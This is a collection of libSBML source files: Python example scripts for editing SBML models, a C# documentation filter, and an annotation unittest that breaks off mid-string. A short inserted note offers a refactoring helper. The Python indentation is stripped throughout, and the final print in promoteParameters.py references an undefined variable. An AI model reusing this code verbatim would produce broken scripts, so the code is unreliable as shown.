rr.Logger.log(rr.Logger.LOG_TRACE, "A tracing message. This is the lowest priority.")
rr.Logger.log(rr.Logger.LOG_NOTICE, "logging with default colors:")
log()
rr.Logger.setFormattingPattern("%Y-%m-%d %H:%M:%S %p: %t")
log()
rr.Logger.setProperty("traceColor", "red")
rr.Logger.setProperty("debugColor", "green")
rr.Logger.setProperty("informationColor", "blue")
rr.Logger.setProperty("noticeColor", "magenta")
rr.Logger.setProperty("warningColor", "cyan")
rr.Logger.setProperty("errorColor", "gray")
rr.Logger.setProperty("criticalColor", "white")
rr.Logger.setProperty("fatalColor", "brown")
rr.Logger.log(rr.Logger.LOG_NOTICE, "logging with new and better colors:")
log()
```
#### File: src/filters/doc-filter-csharp.py
```python
import sys, string, os.path, re
def filterForDoxygen (istream, ostream):
# We read the stream line by line, looking for our marker. The marker is
# created by src/bindings/swig/swigdoc.py; it is *not* the same marker as
# we use in Doxygen comments, but rather a separate marker used for
# communication between swigdoc.py and this script (doc-filter-csharp.py).
pattern = re.compile(r'(.+?)/\* libsbml-internal \*/(.+?)public(.+?)')
for line in istream.readlines():
match = pattern.search(line)
if match:
ostream.write(pattern.sub(r'\1\2private\3', line))
else:
ostream.write(line)
def main (args):
"""Usage: csdocfilter.py file > output
This cooks the final output of our swigdoc.py + SWIG sequence for use
with doxygen, to do additional transformations that can't be done in
swigdoc.py because they rely on having in hand the final output from
SWIG. This only acts on files whose names end in .cs.
"""
if len(args) != 2:
print(main.__doc__)
sys.exit(1)
istream = open(args[1], 'r')
# Only process the content if it's C#.
if re.search('.cs$', args[1]):
filterForDoxygen(istream, sys.stdout)
else:
sys.stdout.write(istream.read())
istream.close()
sys.exit(0)
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/addingEvidenceCodes_1.py
```python
import sys
import os.path
from libsbml import *
def main (args):
"""usage: addingEvidenceCodes_1 <input-filename> <output-filename>
Adds controlled vocabulary term to a reaction
"""
if len(args) != 3:
print(main.__doc__)
sys.exit(2)
d = readSBML(args[1]);
errors = d.getNumErrors();
if (errors > 0):
print("Read Error(s):\n");
d.printErrors();
print("Correct the above and re-run.\n");
else:
n = d.getModel().getNumReactions();
if (n <= 0):
print("Model has no reactions.\n Cannot add CV terms\n");
else:
r = d.getModel().getReaction(0);
# check that the reaction has a metaid
# no CVTerms will be added if there is no metaid to reference
#
if ( not r.isSetMetaId()):
r.setMetaId("metaid_0000052");
cv1 = CVTerm(BIOLOGICAL_QUALIFIER);
cv1.setBiologicalQualifierType(BQB_IS_DESCRIBED_BY);
cv1.addResource("urn:miriam:obo.eco:ECO%3A0000183");
r.addCVTerm(cv1);
cv2 = CVTerm(BIOLOGICAL_QUALIFIER);
cv2.setBiologicalQualifierType(BQB_IS);
cv2.addResource("urn:miriam:kegg.reaction:R00756");
cv2.addResource("urn:miriam:reactome:REACT_736");
r.addCVTerm(cv2);
writeSBML(d, args[2]);
return errors;
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/addingEvidenceCodes_2.py
```python
import sys
import os.path
from libsbml import *
def main (args):
"""usage: addingEvidenceCodes_2 <input-filename> <output-filename>
Adds controlled vocabulary term to a species
"""
if len(args) != 3:
print(main.__doc__)
sys.exit(2)
d = readSBML(args[1]);
errors = d.getNumErrors();
if (errors > 0):
print("Read Error(s):\n");
d.printErrors();
print("Correct the above and re-run.\n");
else:
n = d.getModel().getNumSpecies();
if (n <= 0):
print("Model has no species.\n Cannot add CV terms\n");
else:
s = d.getModel().getSpecies(0);
# check that the species has a metaid
# no CVTerms will be added if there is no metaid to reference
#
if (not s.isSetMetaId()):
s.setMetaId("metaid_0000052");
cv1 = CVTerm(BIOLOGICAL_QUALIFIER);
cv1.setBiologicalQualifierType(BQB_OCCURS_IN);
cv1.addResource("urn:miriam:obo.go:GO%3A0005764");
s.addCVTerm(cv1);
# now create the additional annotation
# <rdf:Statement>
# <rdf:subject rdf:resource="#metaid_0000052"/>
# <rdf:predicate rdf:resource="http://biomodels.net/biology-qualifiers/occursIn"/>
# <rdf:object rdf:resource="urn:miriam:obo.go:GO%3A0005764"/>
# <bqbiol:isDescribedBy>
# <rdf:Bag>
# <rdf:li rdf:resource="urn:miriam:obo.eco:ECO%3A0000004"/>
# <rdf:li rdf:resource="urn:miriam:pubmed:7017716"/>
# </rdf:Bag>
# </bqbiol:isDescribedBy>
# </rdf:Statement>
# attributes
blank_att = XMLAttributes();
resource_att = XMLAttributes();
# create the outer statement node
statement_triple = XMLTriple("Statement",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
statement_token = XMLToken(statement_triple, blank_att);
statement = XMLNode(statement_token);
# create the subject node
subject_triple = XMLTriple("subject",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
resource_att.clear();
resource_att.add("rdf:resource", "#" + s.getMetaId());
subject_token = XMLToken(subject_triple, resource_att);
subject = XMLNode(subject_token);
#create the predicate node
predicate_triple = XMLTriple("predicate",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
resource_att.clear();
resource_att.add("rdf:resource",
"http://biomodels.net/biology-qualifiers/occursIn");
predicate_token = XMLToken(predicate_triple, resource_att);
predicate = XMLNode(predicate_token);
#create the object node
object_triple = XMLTriple("object",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
resource_att.clear();
resource_att.add("rdf:resource", "urn:miriam:obo.go:GO%3A0005764");
object_token = XMLToken(object_triple, resource_att);
object_ = XMLNode(object_token);
# create the bqbiol node
bqbiol_triple = XMLTriple("isDescribedBy",
"http://biomodels.net/biology-qualifiers/",
"bqbiol");
bqbiol_token = XMLToken(bqbiol_triple, blank_att);
bqbiol = XMLNode(bqbiol_token);
# create the bag node
bag_triple = XMLTriple("Bag",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
bag_token = XMLToken(bag_triple, blank_att);
bag = XMLNode(bag_token);
# create each li node and add to the bag
li_triple = XMLTriple("li",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
resource_att.clear();
resource_att.add("rdf:resource", "urn:miriam:obo.eco:ECO%3A0000004");
li_token = XMLToken(li_triple, resource_att);
li_token.setEnd();
li = XMLNode(li_token);
bag.addChild(li);
resource_att.clear();
resource_att.add("rdf:resource", "urn:miriam:pubmed:7017716");
li_token = XMLToken(li_triple, resource_att);
li_token.setEnd();
li = XMLNode(li_token);
bag.addChild(li);
# add the bag to bqbiol
bqbiol.addChild(bag);
# add subject, predicate, object and bqbiol to statement
statement.addChild(subject);
statement.addChild(predicate);
statement.addChild(object_);
statement.addChild(bqbiol);
# create a top-level RDF element
# this will ensure correct merging
#
xmlns = XMLNamespaces();
xmlns.add("http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf");
xmlns.add("http://purl.org/dc/elements/1.1/", "dc");
xmlns.add("http://purl.org/dc/terms/", "dcterms");
xmlns.add("http://www.w3.org/2001/vcard-rdf/3.0#", "vCard");
xmlns.add("http://biomodels.net/biology-qualifiers/", "bqbiol");
xmlns.add("http://biomodels.net/model-qualifiers/", "bqmodel");
RDF_triple = XMLTriple("RDF",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#",
"rdf");
RDF_token = XMLToken(RDF_triple, blank_att, xmlns);
annotation = XMLNode(RDF_token);
# add the statement node to the RDF node
annotation.addChild(statement);
s.appendAnnotation(annotation);
writeSBML(d, args[2]);
return errors;
if __name__ == '__main__':
main(sys.argv)
```
#### File: python/comp/flattenModel.py
```python
import sys
import os.path
import libsbml
def main (args):
"""usage: flattenModel.py [-p] input-filename output-filename
-p : list unused ports
"""
if len(args) != 4 and len(args) != 3 :
print(main.__doc__)
sys.exit(1)
leavePorts = False
if len(args) == 3:
infile = args[1]
outfile = args[2]
elif len(args) == 4:
if args[1] != "-p":
print(main.__doc__)
sys.exit(1)
else:
leavePorts = True
infile = args[2]
outfile = args[3]
if not os.path.exists(infile):
print("[Error] %s : No such file." % (infile))
sys.exit(1)
reader = libsbml.SBMLReader()
writer = libsbml.SBMLWriter()
sbmldoc = reader.readSBML(infile)
if sbmldoc.getNumErrors() > 0:
if sbmldoc.getError(0).getErrorId() == libsbml.XMLFileUnreadable:
# Handle case of unreadable file here.
sbmldoc.printErrors()
elif sbmldoc.getError(0).getErrorId() == libsbml.XMLFileOperationError:
# Handle case of other file error here.
sbmldoc.printErrors()
else:
# Handle other error cases here.
sbmldoc.printErrors()
sys.exit(1)
# Create the converter options
props = libsbml.ConversionProperties()
props.addOption("flatten comp", True, "flatten comp")
props.addOption("leavePorts", leavePorts, "unused ports should be listed in the flattened model")
# do conversion
result = sbmldoc.convert(props)
if (result != libsbml.LIBSBML_OPERATION_SUCCESS):
sbmldoc.printErrors()
print("[Error] Conversion failed... ("+ str(result) + ")")
sys.exit(1)
writer.writeSBML(sbmldoc, outfile)
print("Flat model written to %s" % (outfile))
if __name__ == '__main__':
main(sys.argv)
```
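flattenModel.py above and promoteParameters.py / stripPackage.py below all repeat the same read, convert, write skeleton, which factors cleanly into one helper. A sketch under the same libsbml API (the option dictionary shown in the comment is taken from the surrounding examples):
```python
import libsbml

def convert_document(infile, outfile, options):
    """Read an SBML file, apply converter options, and write the result.

    options: dict mapping option name -> (value, description)
    """
    doc = libsbml.readSBML(infile)
    if doc.getNumErrors() > 0:
        doc.printErrors()
        raise RuntimeError("could not read %s" % infile)
    props = libsbml.ConversionProperties()
    for name, (value, description) in options.items():
        props.addOption(name, value, description)
    if doc.convert(props) != libsbml.LIBSBML_OPERATION_SUCCESS:
        doc.printErrors()
        raise RuntimeError("conversion failed for %s" % infile)
    libsbml.SBMLWriter().writeSBML(doc, outfile)

# e.g. the flattening run from above:
# convert_document("model.xml", "flat.xml",
#                  {"flatten comp": (True, "flatten comp"),
#                   "leavePorts": (False, "unused ports should be listed in the flattened model")})
```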
#### File: examples/python/promoteParameters.py
```python
import sys
import os.path
import libsbml
def main (args):
"""usage: promoteParameters.py input-filename output-filename
"""
if len(args) != 3:
print(main.__doc__)
sys.exit(1)
infile = args[1]
outfile = args[2]
if not os.path.exists(infile):
print("[Error] %s : No such file." % (infile))
sys.exit(1)
reader = libsbml.SBMLReader()
writer = libsbml.SBMLWriter()
sbmldoc = reader.readSBML(infile)
if sbmldoc.getNumErrors() > 0:
if sbmldoc.getError(0).getErrorId() == libsbml.XMLFileUnreadable:
# Handle case of unreadable file here.
sbmldoc.printErrors()
elif sbmldoc.getError(0).getErrorId() == libsbml.XMLFileOperationError:
# Handle case of other file error here.
sbmldoc.printErrors()
else:
# Handle other error cases here.
sbmldoc.printErrors()
sys.exit(1)
props = libsbml.ConversionProperties()
props.addOption("promoteLocalParameters", True, "Promotes all Local Parameters to Global ones")
if (sbmldoc.convert(props) != libsbml.LIBSBML_OPERATION_SUCCESS):
print("[Error] Conversion failed...")
sys.exit(1)
writer.writeSBML(sbmldoc, outfile)
print("[OK] wrote %s" % (package, infile, outfile))
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/readSBML.py
```python
import sys
import time
import os
import os.path
from libsbml import *
def main (args):
"""Usage: readSBML filename
"""
if (len(args) != 2):
print("Usage: readSBML filename");
return 1;
filename = args[1];
current = time.perf_counter();
document = readSBML(filename);
errors = document.getNumErrors();
print();
print(" filename: " + filename);
print(" file size: " + str(os.stat(filename).st_size));
print(" read time (ms): " + str((time.perf_counter() - current) * 1000));
print(" validation error(s): " + str(errors));
print();
document.printErrors();
return errors;
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/stripPackage.py
```python
import sys
import os.path
import libsbml
def main (args):
"""usage: stripPackage.py input-filename package-to-strip output-filename
"""
if len(args) != 4:
print(main.__doc__)
sys.exit(1)
infile = args[1]
package = args[2]
outfile = args[3]
if not os.path.exists(infile):
print("[Error] %s : No such file." % (infile))
sys.exit(1)
reader = libsbml.SBMLReader()
writer = libsbml.SBMLWriter()
sbmldoc = reader.readSBML(infile)
if sbmldoc.getNumErrors() > 0:
if sbmldoc.getError(0).getErrorId() == libsbml.XMLFileUnreadable:
# Handle case of unreadable file here.
sbmldoc.printErrors()
elif sbmldoc.getError(0).getErrorId() == libsbml.XMLFileOperationError:
# Handle case of other file error here.
sbmldoc.printErrors()
else:
# Handle other error cases here.
sbmldoc.printErrors()
sys.exit(1)
props = libsbml.ConversionProperties()
props.addOption("stripPackage", True, "Strip SBML Level 3 package constructs from the model")
props.addOption("package", package, "Name of the SBML Level 3 package to be stripped")
if (sbmldoc.convert(props) != libsbml.LIBSBML_OPERATION_SUCCESS):
print("[Error] Conversion failed...")
sys.exit(1)
writer.writeSBML(sbmldoc, outfile)
print("[OK] stripped package '%s' from %s to %s" % (package, infile, outfile))
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/unsetNotes.py
```python
import sys
import time
import os
import os.path
from libsbml import *
def main (args):
"""Usage: unsetNotes <input-filename> <output-filename>
"""
if (len(args) != 3):
print("\n" + "Usage: unsetNotes <input-filename> <output-filename>" + "\n" + "\n");
return 1;
filename = args[1];
document = readSBML(filename);
errors = document.getNumErrors();
if (errors > 0):
document.printErrors();
return errors;
m = document.getModel();
m.unsetNotes();
for i in range(0, m.getNumReactions()):
re = m.getReaction(i);
re.unsetNotes();
for j in range(0, re.getNumReactants()):
rt = re.getReactant(j);
rt.unsetNotes();
for j in range(0, re.getNumProducts()):
rt = re.getProduct(j);
rt.unsetNotes();
for j in range(0, re.getNumModifiers()):
md = re.getModifier(j);
md.unsetNotes();
if (re.isSetKineticLaw()):
kl = re.getKineticLaw();
kl.unsetNotes();
for j in range(0, kl.getNumParameters()):
pa = kl.getParameter(j);
pa.unsetNotes();
for i in range(0, m.getNumSpecies()):
sp = m.getSpecies(i);
sp.unsetNotes();
for i in range(0, m.getNumCompartments()):
sp = m.getCompartment(i);
sp.unsetNotes();
for i in range(0, m.getNumFunctionDefinitions()):
sp = m.getFunctionDefinition(i);
sp.unsetNotes();
for i in range(0, m.getNumUnitDefinitions()):
sp = m.getUnitDefinition(i);
sp.unsetNotes();
for i in range(0, m.getNumParameters()):
sp = m.getParameter(i);
sp.unsetNotes();
for i in range(0, m.getNumRules()):
sp = m.getRule(i);
sp.unsetNotes();
for i in range(0, m.getNumInitialAssignments()):
sp = m.getInitialAssignment(i);
sp.unsetNotes();
for i in range(0, m.getNumEvents()):
sp = m.getEvent(i);
sp.unsetNotes();
for j in range(0, sp.getNumEventAssignments()):
ea = sp.getEventAssignment(j);
ea.unsetNotes();
for i in range(0, m.getNumSpeciesTypes()):
sp = m.getSpeciesType(i);
sp.unsetNotes();
for i in range(0, m.getNumConstraints()):
sp = m.getConstraint(i);
sp.unsetNotes();
writeSBML(document, args[2]);
return errors;
if __name__ == '__main__':
main(sys.argv)
```
#### File: test/annotation/TestSyncAnnotation.py
```python
import sys
import unittest
import libsbml
def wrapString(s):
return s
pass
class TestSyncAnnotation(unittest.TestCase):
global d
d = None
global m
m = None
def equals(self, *x):
if len(x) == 2:
return x[0] == x[1]
elif len(x) == 1:
return x[0] == self.OSS.str()
def setUp(self):
filename = "../../sbml/annotation/test/test-data/annotationL3_2.xml"
self.d = libsbml.readSBML(filename)
self.m = self.d.getModel()
pass
def tearDown(self):
self.d = None
pass
def test_SyncAnnotation_deleteCVTerms(self):
c = self.m.getCompartment(1)
xml = libsbml.RDFAnnotationParser.deleteRDFCVTermAnnotation(c.getAnnotation())
expected = wrapString("<annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,xml.toXMLString()) )
pass
def test_SyncAnnotation_deleteModelOnly(self):
c = self.m.getCompartment(1)
xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(c.getAnnotation())
expected = wrapString("<annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,xml.toXMLString()) )
pass
def test_SyncAnnotation_deleteModelOnly_1(self):
c = self.m.getCompartment(7)
xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(c.getAnnotation())
expected = wrapString("<annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,xml.toXMLString()) )
xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(None)
self.assertIsNone(xml)
xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(libsbml.XMLNode.convertStringToXMLNode("<notannotatio/>"))
self.assertIsNone(xml)
pass
def test_SyncAnnotation_modifyBoth_1(self):
c = self.m.getCompartment(0)
mh = self.m.getModelHistory().clone()
cv = self.m.getCVTerm(0).clone()
c.setModelHistory(mh)
c.addCVTerm(cv)
c.unsetCVTerms()
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
c.unsetModelHistory()
c.addCVTerm(cv)
expected1 = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected1,c.toSBML()) )
c.setModelHistory(mh)
c.unsetCVTerms()
c.addCVTerm(cv)
expected2 = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected2,c.toSBML()) )
pass
def test_SyncAnnotation_modifyBoth_2(self):
c = self.m.getCompartment(0)
mh = self.m.getModelHistory().clone()
cv = self.m.getCVTerm(0).clone()
c.setModelHistory(mh)
c.unsetModelHistory()
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyBoth_3(self):
c = self.m.getCompartment(0)
mh = self.m.getModelHistory().clone()
cv = self.m.getCVTerm(0).clone()
c.setModelHistory(mh)
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyBoth_4(self):
c = self.m.getCompartment(1)
mh = c.getModelHistory().clone()
cv = c.getCVTerm(0).clone()
c.unsetModelHistory()
c.unsetCVTerms()
expected = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
